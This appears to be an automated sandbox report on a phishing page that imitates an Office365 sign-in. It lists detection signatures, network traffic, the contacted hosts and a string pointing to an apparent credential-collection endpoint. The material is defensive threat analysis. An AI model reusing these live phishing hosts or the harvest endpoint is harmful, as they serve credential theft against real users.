Edit tour

Windows Analysis Report
https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html

Overview

General Information

Sample URL:	https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html
Analysis ID:	1427103
Infos:

Detection

HTMLPhisher

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish10

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Stores files to the Windows start menu directory

Submit button contains javascript call

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5880 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2024,i,11750120079894253416,16805312831914137619,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 2824 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_71	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html

SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

Phishing site detected (based on favicon image match)

Source: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev	Matcher: Template: microsoft matched with high similarity
Source: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html	Matcher: Template: microsoft matched with high similarity

Yara detected HtmlPhish10

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_71, type: DROPPED

Phishing site detected (based on image similarity)

Source: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Source: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html

Matcher: Template: microsoft matched

Source: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html

HTTP Parser: Number of links: 0

Source: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html

HTTP Parser: Title: Sign in to your Office365 account does not match URL

Source: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html

HTTP Parser: On click: submit_form()

Source: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html

HTTP Parser: <input type="password" .../> found

Source: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html

HTTP Parser: No <meta name="author".. found

Source: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html

HTTP Parser: No <meta name="copyright".. found

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49736 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 104.123.200.136:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.123.200.136:443 -> 192.168.2.5:49729 version: TLS 1.2

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49736 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 104.123.200.136
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /quickbookdoc.html HTTP/1.1Host: pub-778c9922a88c4d2c839b01025172bb0b.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/Converged_v21033_U7M7Fc-d_yiO2hIJng7nRg2.css HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/jquery/3.5.0/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg/ HTTP/1.1Host: pub-778c9922a88c4d2c839b01025172bb0b.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/favicon.ico HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/favicon.ico HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: unknown

DNS traffic detected: queries for: pub-778c9922a88c4d2c839b01025172bb0b.r2.dev

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 23:37:40 GMTContent-Type: text/htmlContent-Length: 27242Connection: closeServer: cloudflareCF-RAY: 875801290d2553b1-ATL

Source: chromecache_71.2.dr

String found in binary or memory: https://abordares.com/quicky/df.php

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: unknown	HTTPS traffic detected: 104.123.200.136:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.123.200.136:443 -> 192.168.2.5:49729 version: TLS 1.2

Source: classification engine

Classification label: mal72.phis.win@16/29@10/7

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2024,i,11750120079894253416,16805312831914137619,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2024,i,11750120079894253416,16805312831914137619,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg	0%	URL Reputation	safe
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg	0%	URL Reputation	safe
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/Converged_v21033_U7M7Fc-d_yiO2hIJng7nRg2.css	0%	URL Reputation	safe
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png	0%	URL Reputation	safe
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/favicon.ico	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pub-778c9922a88c4d2c839b01025172bb0b.r2.dev	104.18.3.35	true	false	unknown
part-0013.t-0009.t-msedge.net	13.107.213.41	true	false	unknown
cdnjs.cloudflare.com	104.17.24.14	true	false	high
www.google.com	64.233.177.99	true	false	high
cdn-jm-tools.web.app	199.36.158.100	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js	false		high
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg	false	URL Reputation: safe	unknown
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg	false	URL Reputation: safe	unknown
https://pub-778c9922a88c4d2c839b01025172bb0b.r2.dev/quickbookdoc.html	true		unknown
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/Converged_v21033_U7M7Fc-d_yiO2hIJng7nRg2.css	false	URL Reputation: safe	unknown
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png	false	URL Reputation: safe	unknown
